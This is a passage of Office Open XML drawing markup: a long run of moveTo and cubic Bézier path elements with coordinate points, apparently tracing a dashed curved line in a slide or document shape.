                  <a:cubicBezTo>
                    <a:pt x="739" y="58"/>
                    <a:pt x="742" y="59"/>
                    <a:pt x="744" y="58"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="706" y="71"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="712" y="69"/>
                    <a:pt x="719" y="67"/>
                    <a:pt x="725" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="727" y="64"/>
                    <a:pt x="728" y="62"/>
                    <a:pt x="727" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="727" y="57"/>
                    <a:pt x="724" y="56"/>
                    <a:pt x="722" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="716" y="59"/>
                    <a:pt x="710" y="61"/>
                    <a:pt x="703" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="701" y="64"/>
                    <a:pt x="700" y="67"/>
                    <a:pt x="701" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="702" y="71"/>
                    <a:pt x="704" y="72"/>
                    <a:pt x="706" y="71"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="669" y="86"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="675" y="83"/>
                    <a:pt x="681" y="81"/>
                    <a:pt x="687" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="689" y="77"/>
                    <a:pt x="690" y="75"/>
                    <a:pt x="690" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="689" y="71"/>
                    <a:pt x="687" y="70"/>
                    <a:pt x="685" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="678" y="73"/>
                    <a:pt x="672" y="76"/>
                    <a:pt x="666" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="664" y="79"/>
                    <a:pt x="663" y="81"/>
                    <a:pt x="664" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="664" y="85"/>
                    <a:pt x="667" y="86"/>
                    <a:pt x="669" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="669" y="86"/>
                    <a:pt x="669" y="86"/>
                    <a:pt x="669" y="86"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="632" y="101"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="638" y="99"/>
                    <a:pt x="644" y="96"/>
                    <a:pt x="651" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="653" y="92"/>
                    <a:pt x="653" y="90"/>
                    <a:pt x="653" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="652" y="86"/>
                    <a:pt x="649" y="85"/>
                    <a:pt x="647" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="641" y="89"/>
                    <a:pt x="635" y="91"/>
                    <a:pt x="629" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="627" y="95"/>
                    <a:pt x="626" y="97"/>
                    <a:pt x="627" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="628" y="101"/>
                    <a:pt x="630" y="102"/>
                    <a:pt x="632" y="101"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="596" y="118"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="602" y="115"/>
                    <a:pt x="608" y="112"/>
                    <a:pt x="614" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="616" y="109"/>
                    <a:pt x="617" y="106"/>
                    <a:pt x="616" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="615" y="102"/>
                    <a:pt x="613" y="101"/>
                    <a:pt x="611" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="605" y="105"/>
                    <a:pt x="599" y="108"/>
                    <a:pt x="593" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="591" y="112"/>
                    <a:pt x="590" y="115"/>
                    <a:pt x="591" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="592" y="118"/>
                    <a:pt x="594" y="119"/>
                    <a:pt x="596" y="118"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="561" y="137"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="567" y="134"/>
                    <a:pt x="573" y="130"/>
                    <a:pt x="579" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="581" y="126"/>
                    <a:pt x="581" y="124"/>
                    <a:pt x="580" y="122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="579" y="120"/>
                    <a:pt x="577" y="119"/>
                    <a:pt x="575" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="569" y="123"/>
                    <a:pt x="563" y="126"/>
                    <a:pt x="557" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="555" y="131"/>
                    <a:pt x="555" y="133"/>
                    <a:pt x="556" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="557" y="137"/>
                    <a:pt x="559" y="138"/>
                    <a:pt x="561" y="137"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="527" y="156"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="532" y="153"/>
                    <a:pt x="538" y="150"/>
                    <a:pt x="544" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="546" y="145"/>
                    <a:pt x="546" y="143"/>
                    <a:pt x="545" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="544" y="139"/>
                    <a:pt x="542" y="138"/>
                    <a:pt x="540" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="534" y="143"/>
                    <a:pt x="528" y="146"/>
                    <a:pt x="522" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="521" y="151"/>
                    <a:pt x="520" y="153"/>
                    <a:pt x="521" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="522" y="157"/>
                    <a:pt x="525" y="158"/>
                    <a:pt x="527" y="156"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="493" y="177"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="498" y="174"/>
                    <a:pt x="504" y="170"/>
                    <a:pt x="510" y="167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="511" y="166"/>
                    <a:pt x="512" y="163"/>
                    <a:pt x="511" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="510" y="159"/>
                    <a:pt x="507" y="159"/>
                    <a:pt x="505" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="500" y="164"/>
                    <a:pt x="494" y="167"/>
                    <a:pt x="488" y="171"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="487" y="172"/>
                    <a:pt x="486" y="174"/>
                    <a:pt x="487" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="488" y="178"/>
                    <a:pt x="491" y="179"/>
                    <a:pt x="493" y="177"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="460" y="200"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="465" y="196"/>
                    <a:pt x="471" y="192"/>
                    <a:pt x="476" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="478" y="187"/>
                    <a:pt x="478" y="185"/>
                    <a:pt x="477" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="476" y="181"/>
                    <a:pt x="473" y="181"/>
                    <a:pt x="472" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="466" y="186"/>
                    <a:pt x="461" y="189"/>
                    <a:pt x="455" y="193"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="453" y="195"/>
                    <a:pt x="453" y="197"/>
                    <a:pt x="454" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="455" y="201"/>
                    <a:pt x="458" y="201"/>
                    <a:pt x="460" y="200"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="428" y="223"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="433" y="219"/>
                    <a:pt x="438" y="215"/>
                    <a:pt x="444" y="211"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="445" y="210"/>
                    <a:pt x="446" y="208"/>
                    <a:pt x="444" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="443" y="204"/>
                    <a:pt x="441" y="204"/>
                    <a:pt x="439" y="205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="433" y="209"/>
                    <a:pt x="428" y="213"/>
                    <a:pt x="423" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="421" y="218"/>
                    <a:pt x="421" y="221"/>
                    <a:pt x="422" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="423" y="224"/>
                    <a:pt x="426" y="225"/>
                    <a:pt x="428" y="223"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="396" y="248"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="401" y="244"/>
                    <a:pt x="407" y="240"/>
                    <a:pt x="412" y="236"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="414" y="234"/>
                    <a:pt x="414" y="232"/>
                    <a:pt x="412" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="411" y="228"/>
                    <a:pt x="409" y="228"/>
                    <a:pt x="407" y="229"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="402" y="233"/>
                    <a:pt x="396" y="238"/>
                    <a:pt x="391" y="242"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="390" y="243"/>
                    <a:pt x="389" y="246"/>
                    <a:pt x="391" y="247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="392" y="249"/>
                    <a:pt x="395" y="249"/>
                    <a:pt x="396" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="396" y="248"/>
                    <a:pt x="396" y="248"/>
                    <a:pt x="396" y="248"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="366" y="274"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="371" y="269"/>
                    <a:pt x="376" y="265"/>
                    <a:pt x="381" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="383" y="259"/>
                    <a:pt x="383" y="257"/>
                    <a:pt x="381" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="380" y="253"/>
                    <a:pt x="377" y="253"/>
                    <a:pt x="376" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="371" y="259"/>
                    <a:pt x="366" y="263"/>
                    <a:pt x="361" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="359" y="269"/>
                    <a:pt x="359" y="272"/>
                    <a:pt x="360" y="274"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="362" y="275"/>
                    <a:pt x="364" y="275"/>
                    <a:pt x="366" y="274"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="337" y="301"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="341" y="296"/>
                    <a:pt x="346" y="292"/>
                    <a:pt x="351" y="287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="353" y="286"/>
                    <a:pt x="353" y="283"/>
                    <a:pt x="351" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="280"/>
                    <a:pt x="347" y="280"/>
                    <a:pt x="346" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="341" y="286"/>
                    <a:pt x="336" y="290"/>
                    <a:pt x="331" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="329" y="297"/>
                    <a:pt x="329" y="299"/>
                    <a:pt x="331" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="302"/>
                    <a:pt x="335" y="302"/>
                    <a:pt x="337" y="301"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="308" y="329"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="313" y="324"/>
                    <a:pt x="318" y="319"/>
                    <a:pt x="322" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="324" y="313"/>
                    <a:pt x="324" y="311"/>
                    <a:pt x="322" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="308"/>
                    <a:pt x="318" y="308"/>
                    <a:pt x="317" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="312" y="314"/>
                    <a:pt x="307" y="319"/>
                    <a:pt x="303" y="323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="301" y="325"/>
                    <a:pt x="301" y="328"/>
                    <a:pt x="303" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="304" y="331"/>
                    <a:pt x="307" y="331"/>
                    <a:pt x="308" y="329"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="281" y="358"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="285" y="353"/>
                    <a:pt x="290" y="348"/>
                    <a:pt x="294" y="343"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="296" y="342"/>
                    <a:pt x="296" y="339"/>
                    <a:pt x="294" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="336"/>
                    <a:pt x="290" y="336"/>
                    <a:pt x="289" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="343"/>
                    <a:pt x="280" y="348"/>
                    <a:pt x="275" y="353"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="274" y="354"/>
                    <a:pt x="274" y="357"/>
                    <a:pt x="275" y="358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="277" y="360"/>
                    <a:pt x="280" y="360"/>
                    <a:pt x="281" y="358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="281" y="358"/>
                    <a:pt x="281" y="358"/>
                    <a:pt x="281" y="358"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="255" y="388"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="259" y="383"/>
                    <a:pt x="263" y="378"/>
                    <a:pt x="268" y="373"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="269" y="371"/>
                    <a:pt x="269" y="369"/>
                    <a:pt x="267" y="367"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="366"/>
                    <a:pt x="263" y="366"/>
                    <a:pt x="262" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="257" y="373"/>
                    <a:pt x="253" y="378"/>
                    <a:pt x="249" y="383"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="247" y="385"/>
                    <a:pt x="247" y="387"/>
                    <a:pt x="249" y="389"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="390"/>
                    <a:pt x="253" y="390"/>
                    <a:pt x="255" y="388"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="230" y="419"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="414"/>
                    <a:pt x="238" y="409"/>
                    <a:pt x="242" y="404"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="244" y="402"/>
                    <a:pt x="243" y="399"/>
                    <a:pt x="242" y="398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="397"/>
                    <a:pt x="237" y="397"/>
                    <a:pt x="236" y="399"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="404"/>
                    <a:pt x="228" y="409"/>
                    <a:pt x="223" y="414"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="222" y="416"/>
                    <a:pt x="222" y="419"/>
                    <a:pt x="224" y="420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="421"/>
                    <a:pt x="228" y="421"/>
                    <a:pt x="230" y="419"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="206" y="451"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="446"/>
                    <a:pt x="214" y="441"/>
                    <a:pt x="218" y="435"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="219" y="433"/>
                    <a:pt x="219" y="431"/>
                    <a:pt x="217" y="430"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="428"/>
                    <a:pt x="213" y="429"/>
                    <a:pt x="211" y="430"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="436"/>
                    <a:pt x="203" y="441"/>
                    <a:pt x="199" y="447"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="448"/>
                    <a:pt x="199" y="451"/>
                    <a:pt x="200" y="452"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="454"/>
                    <a:pt x="205" y="453"/>
                    <a:pt x="206" y="451"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="183" y="484"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="479"/>
                    <a:pt x="191" y="473"/>
                    <a:pt x="194" y="468"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="466"/>
                    <a:pt x="195" y="463"/>
                    <a:pt x="193" y="462"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="461"/>
                    <a:pt x="189" y="461"/>
                    <a:pt x="188" y="463"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="469"/>
                    <a:pt x="180" y="474"/>
                    <a:pt x="177" y="480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="482"/>
                    <a:pt x="176" y="484"/>
                    <a:pt x="178" y="485"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="487"/>
                    <a:pt x="182" y="486"/>
                    <a:pt x="183" y="484"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="162" y="518"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="512"/>
                    <a:pt x="169" y="507"/>
                    <a:pt x="172" y="501"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="499"/>
                    <a:pt x="173" y="497"/>
                    <a:pt x="171" y="496"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="494"/>
                    <a:pt x="167" y="495"/>
                    <a:pt x="166" y="497"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="502"/>
                    <a:pt x="159" y="508"/>
                    <a:pt x="155" y="514"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="516"/>
                    <a:pt x="154" y="518"/>
                    <a:pt x="156" y="519"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="521"/>
                    <a:pt x="161" y="520"/>
                    <a:pt x="162" y="518"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="142" y="553"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="547"/>
                    <a:pt x="148" y="541"/>
                    <a:pt x="152" y="535"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="533"/>
                    <a:pt x="152" y="531"/>
                    <a:pt x="150" y="530"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="529"/>
                    <a:pt x="146" y="529"/>
                    <a:pt x="145" y="531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="537"/>
                    <a:pt x="138" y="543"/>
                    <a:pt x="135" y="549"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="551"/>
                    <a:pt x="134" y="553"/>
                    <a:pt x="136" y="554"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="555"/>
                    <a:pt x="141" y="554"/>
                    <a:pt x="142" y="553"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="123" y="588"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="582"/>
                    <a:pt x="129" y="576"/>
                    <a:pt x="132" y="570"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="568"/>
                    <a:pt x="132" y="566"/>
                    <a:pt x="131" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="564"/>
                    <a:pt x="126" y="564"/>
                    <a:pt x="125" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="572"/>
                    <a:pt x="119" y="578"/>
                    <a:pt x="116" y="584"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="586"/>
                    <a:pt x="116" y="589"/>
                    <a:pt x="118" y="590"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="591"/>
                    <a:pt x="122" y="590"/>
                    <a:pt x="123" y="588"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="105" y="624"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="618"/>
                    <a:pt x="111" y="612"/>
                    <a:pt x="114" y="606"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="604"/>
                    <a:pt x="114" y="601"/>
                    <a:pt x="112" y="600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="599"/>
                    <a:pt x="108" y="600"/>
                    <a:pt x="107" y="602"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="608"/>
                    <a:pt x="101" y="614"/>
                    <a:pt x="98" y="620"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="622"/>
                    <a:pt x="98" y="625"/>
                    <a:pt x="100" y="626"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="627"/>
                    <a:pt x="105" y="626"/>
                    <a:pt x="105" y="624"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="89" y="660"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="654"/>
                    <a:pt x="95" y="648"/>
                    <a:pt x="97" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="640"/>
                    <a:pt x="97" y="638"/>
                    <a:pt x="95" y="637"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="636"/>
                    <a:pt x="91" y="637"/>
                    <a:pt x="90" y="639"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="645"/>
                    <a:pt x="85" y="651"/>
                    <a:pt x="82" y="657"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="659"/>
                    <a:pt x="82" y="662"/>
                    <a:pt x="84" y="663"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="663"/>
                    <a:pt x="89" y="663"/>
                    <a:pt x="89" y="660"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="75" y="698"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="691"/>
                    <a:pt x="79" y="685"/>
                    <a:pt x="82" y="679"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="677"/>
                    <a:pt x="82" y="675"/>
                    <a:pt x="80" y="674"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="673"/>
                    <a:pt x="75" y="674"/>
                    <a:pt x="74" y="676"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="682"/>
                    <a:pt x="70" y="689"/>
                    <a:pt x="67" y="695"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="697"/>
                    <a:pt x="67" y="699"/>
                    <a:pt x="70" y="700"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="701"/>
                    <a:pt x="74" y="700"/>
                    <a:pt x="75" y="698"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="61" y="735"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="729"/>
                    <a:pt x="66" y="723"/>
                    <a:pt x="68" y="717"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="714"/>
                    <a:pt x="68" y="712"/>
                    <a:pt x="65" y="711"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="711"/>
                    <a:pt x="61" y="712"/>
                    <a:pt x="60" y="714"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="720"/>
                    <a:pt x="56" y="727"/>
                    <a:pt x="54" y="733"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="735"/>
                    <a:pt x="54" y="737"/>
                    <a:pt x="56" y="738"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="739"/>
                    <a:pt x="61" y="738"/>
                    <a:pt x="61" y="735"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="50" y="774"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="767"/>
                    <a:pt x="53" y="761"/>
                    <a:pt x="55" y="755"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="752"/>
                    <a:pt x="55" y="750"/>
                    <a:pt x="53" y="750"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="749"/>
                    <a:pt x="48" y="750"/>
                    <a:pt x="48" y="752"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="759"/>
                    <a:pt x="44" y="765"/>
                    <a:pt x="42" y="771"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="774"/>
                    <a:pt x="43" y="776"/>
                    <a:pt x="45" y="776"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="777"/>
                    <a:pt x="49" y="776"/>
                    <a:pt x="50" y="774"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="39" y="812"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="806"/>
                    <a:pt x="43" y="799"/>
                    <a:pt x="44" y="793"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="791"/>
                    <a:pt x="44" y="789"/>
                    <a:pt x="41" y="788"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="787"/>
                    <a:pt x="37" y="789"/>
                    <a:pt x="37" y="791"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="797"/>
                    <a:pt x="33" y="804"/>
                    <a:pt x="32" y="810"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="812"/>
                    <a:pt x="32" y="815"/>
                    <a:pt x="34" y="815"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="816"/>
                    <a:pt x="39" y="814"/>
                    <a:pt x="39" y="812"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="30" y="851"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="845"/>
                    <a:pt x="33" y="838"/>
                    <a:pt x="35" y="832"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="829"/>
                    <a:pt x="34" y="827"/>
                    <a:pt x="32" y="827"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="826"/>
                    <a:pt x="27" y="828"/>
                    <a:pt x="27" y="830"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
